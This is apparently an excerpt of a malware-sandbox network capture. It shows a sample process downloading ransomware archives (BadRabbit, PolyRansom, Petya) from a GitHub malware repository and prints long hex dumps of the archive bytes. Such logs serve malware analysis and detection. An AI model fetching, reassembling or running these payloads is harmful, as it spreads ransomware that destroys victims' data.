                                                                                                                                                            2022-09-29 12:44:55 UTC2232INData Raw: 7d 2f cf 2b 66 5e e7 fd f6 04 2d e1 2e c3 2e a3 6f 68 07 35 be 01 71 49 6b 98 ae 0b 35 0c 3e bc 4b e2 9a 59 87 ed 3d 0b f5 41 9b 6d 5f 41 eb 41 ed 67 44 91 99 2c c9 e2 22 b4 ee 16 b9 d3 0c ca 0d c0 55 a2 18 2b 51 3b 0b f8 34 68 e6 9b 47 58 cf 62 c2 31 87 eb fe f1 c1 82 3f 75 4d da 24 50 4b 01 02 3f 00 14 00 01 00 08 00 13 74 0f 49 e7 77 8c 48 2b 00 02 00 00 86 03 00 16 00 24 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 65 74 79 61 2e 41 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 65 92 e4 b8 e8 f6 d1 01 2a d0 df e4 e7 9d d4 01 10 ba de e4 e7 9d d4 01 50 4b 05 06 00 00 00 00 01 00 01 00 68 00 00 00 5f 00 02 00 00 00
                                                                                                                                                            Data Ascii: }/+f^-..oh5qIk5>KY=Am_AAgD,"U+Q;4hGXb1?uM$PK?tIwH+$ Endermanch@Petya.A.exe e*PKh_


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            38192.168.2.649727140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:56 UTC2232OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            39140.82.121.4443192.168.2.649727C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:56 UTC2232INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:56 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:56 UTC2233INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            4192.168.2.649710185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:42 UTC3OUTGET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            40192.168.2.649728185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:56 UTC2235OUTGET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            41185.199.110.133443192.168.2.649728C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:56 UTC2235INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 133759
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "c0c6af3e39ace2d58d00154f6e809181a5c813ca80bbf20f38837a99f8056014"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0800:540D:F52AAF:104AFB9:63359348
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:56 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6935-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455496.348492,VS0,VE152
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: b534aebe17809abb6451fd912abe4d26f13e32ac
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:56 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:44:56 UTC2236INData Raw: 50 4b 03 04 14 00 01 00 08 00 d7 0a 79 45 34 43 fb 93 c7 09 02 00 00 70 03 00 19 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 6f 6c 79 52 61 6e 73 6f 6d 2e 65 78 65 58 ef 05 c0 b6 8a bd fa 25 51 13 b9 f0 ae cd 11 df 91 dc 43 09 90 1b b5 9d 5d 56 12 5c 94 0e ff 03 d7 23 cf 58 8f c9 fc 7a ca d0 4b c3 a3 27 ee 75 4b 94 c3 a8 37 cb c7 96 47 64 25 16 5f 75 8b 47 35 1c ec 30 cf b0 1c 29 8d 4e 7a b2 68 9f 1a b9 f2 b5 cf 25 fc 5f cb e5 54 45 19 d1 c3 7f 29 0e 9a 48 e3 c3 db bf d1 58 a6 62 90 28 e7 25 5d 5d 44 e2 fd ca 22 88 a8 30 1b 7c 35 9b ac 29 b6 47 ea 2d 68 27 71 fa 3a dc b6 a1 8c 7d 62 f8 31 e2 cb 11 3a ce b9 5e a4 0e 64 ef 92 64 9d 74 fb c5 0a 39 83 f1 e4 aa 69 59 2b df 89 eb ae a0 07 94 80 66 94 95 09 21 bb 66 6e af 73 6b ff d8 aa 55 47 28 e9 d7 86 82 af
                                                                                                                                                            Data Ascii: PKyE4CpEndermanch@PolyRansom.exeX%QC]V\#XzK'uK7Gd%_uG50)Nzh%_TE)HXb(%]]D"0|5)G-h'q:}b1:^ddt9iY+f!fnskUG(
                                                                                                                                                            2022-09-29 12:44:56 UTC2237INData Raw: 17 33 ff c8 39 47 fa ee c0 ad ea dc 38 f8 ca 65 24 cf 8a 2b c5 cb f0 93 b0 18 83 98 05 b8 3f 55 28 df a7 92 90 48 63 1c a0 ad 30 71 3e d5 16 f9 a6 5c 20 0c 28 f2 78 b4 5b f5 38 cd 49 b0 e4 1e 4a 2e e8 98 c3 c7 72 d8 4b ad c6 fc 30 05 aa 65 00 27 a1 8e 77 33 05 dc 07 4f 71 ba 48 a8 1e ed ea 11 5e c8 4c f1 45 3b 4b 58 2c e8 d3 77 12 7c 39 e9 f9 04 7c 9b 2b 04 3e 6e 86 73 4e 63 64 c9 ed 8a 88 e7 f5 61 6d 26 7b 79 07 2f d8 35 b3 d0 42 09 2d 06 d0 21 18 b6 28 e9 65 3f e2 fd f8 09 fd 9f d7 ed 2e 94 a5 7d 9c c7 00 88 56 76 ca f7 10 42 f2 5b d5 9a e1 40 59 83 65 c4 07 4a 6d 0d a2 fc 1a b9 5c 9a 94 c3 1d 80 82 d3 d2 58 e9 e6 c1 fb b2 2b 87 05 ee 54 c5 15 da f8 68 7d c5 de 0f 44 33 a4 27 dd 85 43 4c 6c 43 a5 c6 b4 7a d1 47 68 e3 12 99 3d 46 1b 14 a2 4a de 25 5e 89
                                                                                                                                                            Data Ascii: 39G8e$+?U(Hc0q>\ (x[8IJ.rK0e'w3OqH^LE;KX,w|9|+>nsNcdam&{y/5B-!(e?.}VvB[@YeJm\X+Th}D3'CLlCzGh=FJ%^
                                                                                                                                                            2022-09-29 12:44:56 UTC2238INData Raw: bd f7 c9 f4 a3 b7 91 79 2e c3 11 2b 6e 64 1a 4b ea 6c 91 b8 c3 16 33 e8 77 c9 26 f6 aa 9c e4 5c 8b b0 ad a6 07 e1 9c 46 01 f4 f4 3d 7c 84 81 84 bd e4 25 ee b9 e6 b7 ea 46 c7 48 df 0c f2 a8 8d 48 2b d4 a6 b6 be 2f 8f b7 54 ed 32 64 24 bb b6 6f 0c f9 64 5f f4 f0 d0 f5 8b cb b1 41 2e ba 3b bb e6 08 72 24 c7 bd 52 82 ec e6 db 5d fe af bd 52 6c c0 40 40 c6 8e ec 88 a6 30 2b 7d bf 4e 78 6a bf a7 5d 12 c7 80 00 95 c3 cb 75 0b e0 a4 cd 03 03 23 33 bc 68 bd db db 96 93 55 6f 65 85 39 c8 bb 46 7e 20 07 97 3f b4 9d 62 24 65 19 1d 2a 0f 6b 2d 5e b6 16 ab d2 54 d4 ad 39 00 30 6b 38 cb 5c 9e 9c 59 33 7a 6c f4 cf 56 f5 15 19 36 ee 69 3e 4b 27 5b 83 32 3f 85 2d d4 45 97 9b eb 70 66 93 70 86 9c a1 75 c3 1a 30 71 e0 1c 83 3a d5 fe b2 95 a8 8a bf 92 85 94 b3 24 ae f3 b3 c2
                                                                                                                                                            Data Ascii: y.+ndKl3w&\F=|%FHH+/T2d$od_A.;r$R]Rl@@0+}Nxj]u#3hUoe9F~ ?b$e*k-^T90k8\Y3zlV6i>K'[2?-Epfpu0q:$
                                                                                                                                                            2022-09-29 12:44:56 UTC2240INData Raw: af 2f 92 fa 0b 8a 59 a4 6f 60 d1 13 9c b4 d5 e0 b7 69 9e ff 76 40 97 6e 76 11 06 68 4d 66 6e ed 50 b6 b9 dd fe 17 5d d2 d4 26 1f f4 fa 64 c5 02 49 f1 47 27 02 90 d9 96 37 64 b4 69 c6 0a 3e f4 a9 b4 01 b6 9e 1e c4 1b 50 71 70 f1 b7 5b b4 a7 27 f7 22 c2 3b 90 3f c4 03 c9 07 14 8a c2 6c 28 20 63 99 e2 43 fd f0 3d a9 84 d7 e7 46 1b 81 0d d8 28 7b 24 6b ad dc 66 2b 5d 77 0b 9c f2 d5 1e da 6a ab 0a 12 03 29 8f 21 78 36 9e 5a 15 31 b4 e1 d8 08 4a c0 92 8e 09 62 2f 28 9f 31 29 a3 bf a7 f0 f7 e6 3a c1 f8 09 1e c7 02 5a 03 89 8a 7a 54 b1 96 85 54 7d 57 09 4d 85 2d 00 0e fc 5f db 3a 2d 97 cc c0 60 9e f5 bd 40 d3 53 71 14 eb 51 fb 6f 64 b4 cb c1 6a 71 69 71 95 40 4f 59 25 9e 5d 35 7a ea 15 ca be 91 09 c2 d3 0e cc 89 aa 66 6d cd 7b 0a 19 8d 8f 92 b4 7f 1e 0c 6e fd ef
                                                                                                                                                            Data Ascii: /Yo`iv@nvhMfnP]&dIG'7di>Pqp['";?l( cC=F({$kf+]wj)!x6Z1Jb/(1):ZzTT}WM-_:-`@SqQodjqiq@OY%]5zfm{n
                                                                                                                                                            2022-09-29 12:44:56 UTC2241INData Raw: 36 ad 6f 8f d3 b1 7c 89 65 8d da b4 42 c8 e6 93 75 55 84 96 48 65 bd b9 5c 46 96 d7 72 6e 94 7b 79 95 ba 64 46 9e 00 5e f1 93 09 11 c2 a4 f5 5d 96 4e be 29 2b 8b 67 48 3f 2d c8 04 7f a6 65 d5 13 e2 80 cd 4f 6d ae 8c cd 71 bb b4 33 97 ce 27 1d 51 c9 02 6c 7e a0 3f c3 cb a8 f8 29 b0 e0 72 d6 de df 20 1f 0a 38 2e ea 62 4e 3c f1 ec 7c b5 d0 33 c6 01 9f 65 1d 6a 8c ed c3 23 1d 29 68 01 e4 d9 8e a7 a6 0d 80 0c 31 d7 28 92 f2 f1 61 d4 dc 79 20 ac 2c 3a 4a ee 15 c0 be 79 32 78 09 ad 2e 36 9e bf a6 1a bb 27 b3 8b 97 6c e3 61 c0 c5 66 a7 61 9b 22 87 53 ea 7e 4e c6 a4 b1 69 b2 9c 21 c4 b3 7d 8e ea 52 86 5b f6 36 df 94 5d 2f 82 f6 60 e9 c6 1c 71 d5 79 53 a0 9b 3f 74 33 3a 77 6e b8 58 ef cb 45 39 02 b2 6d cd a0 a6 b5 39 8c 7f e5 d7 ea 0e f4 c0 dd 87 30 ea f9 2b a4 92
                                                                                                                                                            Data Ascii: 6o|eBuUHe\Frn{ydF^]N)+gH?-eOmq3'Ql~?)r 8.bN<|3ej#)h1(ay ,:Jy2x.6'lafa"S~Ni!}R[6]/`qyS?t3:wnXE9m90+
                                                                                                                                                            2022-09-29 12:44:56 UTC2242INData Raw: 88 8d 3b 50 8e 4f a5 ce 06 b4 a0 28 e3 90 11 fd a0 db 69 5c df 92 a2 d7 58 4f f8 f4 55 60 6f b6 4d a6 49 1b f1 d9 cf 7f b8 3f a2 74 b6 8a 02 33 3d d3 cb 46 64 57 02 f3 f4 78 04 d0 60 30 f3 c6 93 02 05 c9 74 c0 0d b2 2b f1 42 2c c0 da 6d a6 67 ff a1 f5 e7 fd da 55 1f 0e e0 15 26 a7 55 43 f4 22 31 e5 9e 50 13 a4 f5 f9 1f 36 21 5d 0c 45 0e 70 0a c3 f6 3e 14 b0 65 b3 b7 a8 f4 d1 a6 be 9a 1a 40 c6 3d 06 81 60 f5 7b 32 81 60 e7 04 d1 3f 0e 50 80 f7 5d 82 0f 21 3d e1 3b cc a5 40 2f 86 4d 41 09 7f 71 f0 c3 1c 98 29 95 53 49 ae fb 9c e3 91 0d fe 5d d6 bd 67 49 f2 39 4b e5 29 bb d9 02 63 3e ed bf ba 32 85 96 68 4d 19 8d 4e a7 37 13 b7 f4 74 cc 77 10 a1 5f f3 69 9a bc e7 84 d8 e5 90 91 c7 29 64 c4 82 13 d5 2b 4f b9 a9 a7 39 6d 4d ba 61 8c 82 8f c3 01 ae 61 b2 a8 b4
                                                                                                                                                            Data Ascii: ;PO(i\XOU`oMI?t3=FdWx`0t+B,mgU&UC"1P6!]Ep>e@=`{2`?P]!=;@/MAq)SI]gI9K)c>2hMN7tw_i)d+O9mMaa
                                                                                                                                                            2022-09-29 12:44:56 UTC2244INData Raw: 58 4e 59 50 68 be fa e0 fc dc c5 7d fb 22 db 08 a8 cd 83 fe 14 3b 85 62 f3 9f 8b 2c f8 08 a7 69 e0 39 44 b7 e7 e1 e7 2b af c9 d0 09 eb 96 b8 d1 b0 0e 30 55 e5 35 e8 d1 96 5d 18 8c c4 8b 6b a0 63 97 c0 21 41 19 f2 b7 57 f5 0f d6 44 64 7e f7 5f ba 82 4d ca a9 08 d3 b6 31 ee ad df fe 76 a7 ab 04 f3 36 e5 0d 89 bf 8c a0 00 8c ff 7e 27 c2 13 a6 0f 87 94 5f 75 99 c3 86 2f 12 26 0c b5 a8 ff 6e c5 0f eb 20 be 28 83 38 60 8d 18 bc 8d ab 56 37 76 fe 16 1d 24 fc c3 ff 22 76 53 21 29 7d 6f c9 69 a6 8b e9 35 ef 51 95 bf c2 df da 7f dd 26 f0 4e 7d 8b da 21 98 d2 6a 57 75 87 37 0e 5e b7 f9 32 3c f2 17 fc de 22 65 3f 4c 6d 84 a1 dc 7c 7b 84 05 82 6a 54 79 a8 5f fd a3 e8 b9 67 9f 37 b1 7a a5 4e b0 01 b1 e3 d2 49 4e b6 a1 32 bf 87 e2 77 8b 26 e6 fd f8 ea 88 40 f2 67 31 a7
                                                                                                                                                            Data Ascii: XNYPh}";b,i9D+0U5]kc!AWDd~_M1v6~'_u/&n (8`V7v$"vS!)}oi5Q&N}!jWu7^2<"e?Lm|{jTy_g7zNIN2w&@g1
                                                                                                                                                            2022-09-29 12:44:56 UTC2245INData Raw: 17 4f 9f 16 79 0e e3 11 02 3c 20 eb 0b ad ec b9 43 6d b0 7d 80 8c 8a c3 5d 96 d3 d9 40 6f 7e 0f 47 88 d7 e7 85 4c 3e 7d 24 92 01 2e 4c 3a 5f 68 df 84 25 c5 93 c2 76 1a 38 2d 7a 2b 46 a7 49 ee 22 c1 88 ac c9 a5 ae 6d e3 30 7d db 13 54 04 b4 f6 7b c6 5c 6a 38 c4 34 20 1e 5d 91 82 80 eb 5e be 6b 6c f4 90 14 d1 3d 15 12 3f 6f 2e 80 f2 7c 36 55 6f 95 10 13 59 9f 60 42 cb 7f fb d0 17 3b aa 8a 0b 33 e2 a0 ad a8 a0 2c aa 1b 45 d0 9e 41 e1 59 7d 76 bf 97 a1 58 d6 e9 8e fb 99 11 91 c4 aa ee 4e 8f 4f 83 7d ef ca e6 6f b0 3f 73 b2 d4 d9 30 7d cf 0e f6 0c 8e d4 63 8f ba f2 f8 2e b0 53 b0 2e 15 1d aa 4d 9a 3c bc 15 a3 72 99 63 b7 42 40 1e ef 55 95 e9 36 00 42 14 8e 79 42 32 c2 65 48 ea e0 48 4d a9 fd bc 1a 7e cb 28 45 00 a9 db f3 d2 7c 22 e9 42 87 f4 a8 84 1f 64 9a 14
                                                                                                                                                            Data Ascii: Oy< Cm}]@o~GL>}$.L:_h%v8-z+FI"m0}T{\j84 ]^kl=?o.|6UoY`B;3,EAY}vXNO}o?s0}c.S.M<rcB@U6ByB2eHHM~(E|"Bd
                                                                                                                                                            2022-09-29 12:44:56 UTC2246INData Raw: bd e4 3e e9 4f 63 22 01 2d c1 3b 76 92 1a 58 50 43 55 35 a7 7a 03 5e a6 11 56 90 cf 03 15 80 36 77 9a e7 1e 12 ab dc 70 2b 8b cc cc 83 06 4e 04 0f fd fa 69 73 45 20 85 9c 52 e9 83 08 bb 32 42 f8 9b 00 78 e0 8e 44 2f 1a aa 2b 89 a6 ea 52 cb fa 2e 77 25 f8 f6 94 78 9c 77 fb 3a 31 43 ce 3c ce fc 44 a6 79 fd 48 28 ab e1 dd 83 9d e4 1a 09 d1 e1 3f fd 66 75 7c 7b e7 00 a8 41 46 27 89 ce ba e3 69 a1 cb 3d 5e 40 8f b0 cf 22 f0 05 a9 79 47 56 1c 69 5d 89 3c 64 95 2d 82 b4 7d 0e 85 c2 6d ba ea 70 82 16 d2 a3 89 da a8 8f 40 1d 9c a9 0c 68 77 c5 3e 73 a1 f2 b4 5e 9b 17 a2 1c 3e 7f 4a e6 5c d1 98 14 e8 ce 6d 47 cf 8c 00 f8 bf 18 16 39 65 1c bd 32 92 a2 9e ad 41 48 2f 4a bb 9d 9c 52 fa 29 a6 54 34 b2 8e 1a fd d6 4b 10 d9 0b 2d 32 63 cc b3 75 31 2b e5 05 35 c8 97 aa 62
                                                                                                                                                            Data Ascii: >Oc"-;vXPCU5z^V6wp+NisE R2BxD/+R.w%xw:1C<DyH(?fu|{AF'i=^@"yGVi]<d-}mp@hw>s^>J\mG9e2AH/JR)T4K-2cu1+5b
                                                                                                                                                            2022-09-29 12:44:56 UTC2248INData Raw: 9f ef 66 f3 94 af 4c b3 09 2d ab 0e 4e af 97 cd 23 bd 24 8a a5 9d b2 af 58 33 93 68 cb 5a ec 70 3f eb aa 56 e7 0a 29 b0 cc 2f 25 e4 e4 e7 3f de ec bb ef 17 56 22 a8 75 da 1f b2 81 d8 36 73 d5 cd 75 2c 9a dd a4 f4 cf 13 c7 34 a9 f0 12 db dd 27 fd 16 54 be 21 62 2c ac 9b a5 2e 32 d7 95 73 14 00 c0 89 f1 83 5c 1c c8 6a 6f 21 15 25 e3 b4 ea 01 97 b8 38 e2 d8 65 69 cf 54 dc 30 a2 61 40 30 18 0b 95 09 a9 97 73 47 ac a9 d3 44 fa 3d b9 51 b1 6e 24 60 3b aa c3 0a fb 9a ea fd 46 24 2b ba f5 b1 fa 71 19 22 a4 33 85 c1 bd df 8e b2 b2 55 0e 17 c8 15 1d b2 f7 a4 d1 cd ad de a1 30 a1 ae 69 f1 d2 d4 8a ef 39 e2 d2 42 91 7e 5d d3 b9 5c 95 2a c4 18 88 2c be 50 09 61 6f 9b 7e fb f1 0f 81 d6 16 ac 29 b8 17 b1 b9 a8 e5 84 50 e8 65 d1 e9 0c 6e 78 c7 61 43 fd da 20 1d 99 bd be
                                                                                                                                                            Data Ascii: fL-N#$X3hZp?V)/%?V"u6su,4'T!b,.2s\jo!%8eiT0a@0sGD=Qn$`;F$+q"3U0i9B~]\*,Pao~)PenxaC
                                                                                                                                                            2022-09-29 12:44:56 UTC2249INData Raw: aa 35 fc ed f9 c6 6c 45 53 3e 65 c2 04 79 94 18 80 5b 5c 47 94 28 b4 16 8b 92 ff f0 e4 e3 08 f2 c5 b2 05 1b 63 f1 11 da a4 07 cd 9c 5c 72 16 40 b0 88 7b 70 a8 cd fc 61 43 63 80 fd 6d 5e ab 74 50 99 9a 89 88 cb 07 73 e2 62 40 9f c6 7f 68 00 24 7e ca b7 53 8b e8 6a a6 3c e3 07 56 a3 96 a6 37 2a 66 14 a8 09 cf 0e 03 59 df 25 da 2c 2c 1a 63 fe ac 67 a3 8c e6 3b 9d 0c 8f 1d 6c 52 4a d2 6d 04 fb 63 8d 31 1a d4 6a 2f e6 e8 42 bd 26 b6 86 79 51 c3 16 07 d0 59 43 b4 0d 06 da bb a8 13 14 d3 61 06 79 2d 6d 32 12 9f 0d 0c 36 16 92 76 5f 8b 17 fa a1 76 77 40 61 e7 26 da 36 67 c0 c1 e9 8a f6 c2 43 b3 39 89 56 a0 9d 2f 69 f8 3d e6 2f 51 c4 5e a2 c7 e6 ad 6d b2 50 8b e1 0b 2e bd 49 84 b2 f0 2b ce 3d 65 13 12 d0 de 76 d3 4a d9 34 c7 5d 13 54 62 ee cb da 03 23 8c b0 2c 20
                                                                                                                                                            Data Ascii: 5lES>ey[\G(c\r@{paCcm^tPsb@h$~Sj<V7*fY%,,cg;lRJmc1j/B&yQYCay-m26v_vw@a&6gC9V/i=/Q^mP.I+=evJ4]Tb#,
                                                                                                                                                            2022-09-29 12:44:56 UTC2250INData Raw: 30 d8 57 76 4c f0 0a de 96 b8 b8 07 a3 40 fb 59 1f b7 3e 70 b5 a1 b4 9c ad bc a9 23 e6 4e 38 22 6d b6 63 da 85 56 94 1e c1 ed 8b b4 a4 0d 63 c5 db 96 7a e2 54 93 80 0f e9 3d 27 80 c3 f9 d0 6f a8 29 36 05 a1 d5 e4 a4 5b 11 3e 7a dd 31 fa 00 75 5e 5a 44 90 a2 37 e8 ea 28 63 a5 82 fd ec 53 c4 f4 af b0 ba 7e a4 d8 43 1a 68 2c 18 9a 5f bd 70 e6 c2 82 d7 03 c4 9e 3c 70 95 89 fb 0e 21 aa 7e 26 84 2a c1 29 67 4a 24 96 1c fd 9d 71 ec f0 32 35 51 04 7a 26 c1 bd 72 07 f5 a6 f6 ce 72 b6 d6 4f fd a1 42 e3 22 f0 fd 7b ab 46 67 71 9e 14 ed ae 18 f0 3f b3 31 4f d5 7c 4f 64 f3 93 b8 e1 f5 88 2a 03 b0 23 58 7c 28 5b 7c b8 5e 4b c7 ea 6f bd c2 52 ec 9e e5 e1 7e 0b 9b 6f 47 0d 4f 93 82 57 70 c8 1e c4 c1 ad f1 c6 02 3a ba 0a 1b b0 06 fb f7 66 c5 7a 02 0c bb 0d f7 5e c9 9b 9e
                                                                                                                                                            Data Ascii: 0WvL@Y>p#N8"mcVczT='o)6[>z1u^ZD7(cS~Ch,_p<p!~&*)gJ$q25Qz&rrOB"{Fgq?1O|Od*#X|([|^KoR~oGOWp:fz^
                                                                                                                                                            2022-09-29 12:44:56 UTC2251INData Raw: 93 ce 70 1f b5 d7 1d a3 ba 82 ab 97 46 aa 94 fa 93 f8 cb 88 c8 d9 7e 2c 2c f8 02 23 c4 04 6a 85 ef 1f 1d 95 a2 ff 49 3d 3c f8 2d f0 a9 be 07 6d 9d 83 12 5a 16 65 cd fc 48 45 b6 9c 10 52 55 de 4f 31 ee e6 84 b4 b0 cd 0c ea 61 a6 9e a6 5c 87 bf 97 52 ce aa 81 ea fc 35 8a 7b 94 5b 49 9f 2e 44 ac 35 fa 69 f4 56 79 8d 46 ed 11 8d 8d 30 bb a9 2b 42 98 f0 cf 3b 50 3a d9 0d de cd f3 45 20 00 ea bf c2 ac 13 74 e4 e5 a2 64 59 da f5 ac 2c 54 9a 25 61 8c ab b4 6f a6 03 cc 44 62 ac a7 52 a0 32 d7 fe 54 de 8a 40 70 ce 82 5a 3a 66 72 e1 e0 af 25 f1 1e a8 a7 3d 53 8f ca 0f 8d f9 0a 00 03 0a 82 33 47 1c f3 0c b8 f6 2c 5d 87 87 2c 0b 9b 4a b7 2c f7 db 19 e4 fc 49 b6 8c 6e e5 d9 97 73 b9 c2 40 ef 59 94 69 72 d5 c0 2d f1 f6 4e 95 a9 82 68 55 f8 b4 d9 f7 bf 2b d4 5a 8f 20 9f
                                                                                                                                                            Data Ascii: pF~,,#jI=<-mZeHERUO1a\R5{[I.D5iVyF0+B;P:E tdY,T%aoDbR2T@pZ:fr%=S3G,],J,Ins@Yir-NhU+Z
                                                                                                                                                            2022-09-29 12:44:56 UTC2267INData Raw: db 56 5f 9e cf 30 00 ec b8 bd 48 11 f1 69 de 65 46 a4 63 c1 c0 f7 3e 36 cd 0d c2 72 82 9e b1 a6 24 b6 d4 04 58 28 d1 b3 3d 44 16 a0 10 81 8b 0a 0c 94 0b ea 0a 41 a3 72 4b d5 d3 db b4 d9 e4 4f 25 c8 08 15 03 5d 1c 47 18 93 a1 08 d2 f7 14 19 e9 0c cf 8f fe df 0d 26 80 f7 e2 68 99 2c 54 75 bd b1 73 5e 89 aa 4a 35 70 cb 12 dc a2 38 97 2d 44 a5 0a 87 ac 48 ad 5c 41 2b be 96 70 63 cd 28 c5 38 78 4a ab 8e b3 b5 4f 19 c3 3f 46 01 d3 50 8a 23 20 e6 fe e3 0b b0 2e d1 fd 65 de a3 5b 6f 3a bb 03 88 97 30 8e 70 f5 46 f2 4d ba 0b cd 4b b4 13 68 0a 87 ae 7e 4a c7 cd 0b 1a 7a 3c a0 07 e6 e6 60 47 38 ba 4c c5 1f d3 6c 20 6f 47 ba b9 8b c5 ac f6 1c e8 7a 50 bc 52 f0 48 a5 81 27 fa 02 84 99 ab b4 f3 14 d8 3c d6 95 72 8f 46 dd b3 fa 43 41 86 ef 34 06 67 0f ae 83 4d 18 db 12
                                                                                                                                                            Data Ascii: V_0HieFc>6r$X(=DArKO%]G&h,Tus^J5p8-DH\A+pc(8xJO?FP# .e[o:0pFMKh~Jz<`G8Ll oGzPRH'<rFCA4gM
                                                                                                                                                            2022-09-29 12:44:56 UTC2283INData Raw: dd e8 e4 65 a8 fd 43 bb 6e ca 28 43 c1 da 16 5b 48 22 a8 9f 4d 14 13 dd c0 97 30 20 66 e2 fb 8b f0 33 3b 1b 63 8d 35 4d 0e 20 f5 fb 87 5c 09 4c b9 0a f3 28 a8 b1 97 53 8d 82 86 79 24 64 ad e0 11 e9 cc 71 d5 90 b0 86 4b ab dd fa 15 29 53 4b e3 91 6c 75 7d e6 fc 81 f1 20 ec c3 1e 63 b7 e0 e4 16 82 20 0a 57 ab c2 24 cb f8 ba 5f 61 fc 60 6c 10 d2 22 ea 83 d6 fa 8a cb 77 83 9e 54 4b 16 d3 bd 1f 90 fd 09 e9 8f 96 b3 90 dd e9 e4 1b ce ae 07 53 76 a7 f7 f6 a7 c2 fc e5 92 e8 dd 1e a5 53 94 84 32 c3 fd 8c 09 8e 43 ea a6 e3 70 a6 e5 c6 98 1f e8 bf 9e 57 95 af 35 67 10 e5 bd 48 ec bc 4f 01 1a 2f ef 1f f9 6e 5a af 45 56 76 42 3a 27 76 85 1f 91 34 d3 9b 2a f6 67 4a 7c dd d4 4d a9 33 79 bd a4 f2 9a 6c 30 80 fa ed 68 0a 41 52 d4 0a 7c 61 f3 c3 2a 95 97 f4 ac 9f 2f 94 1a
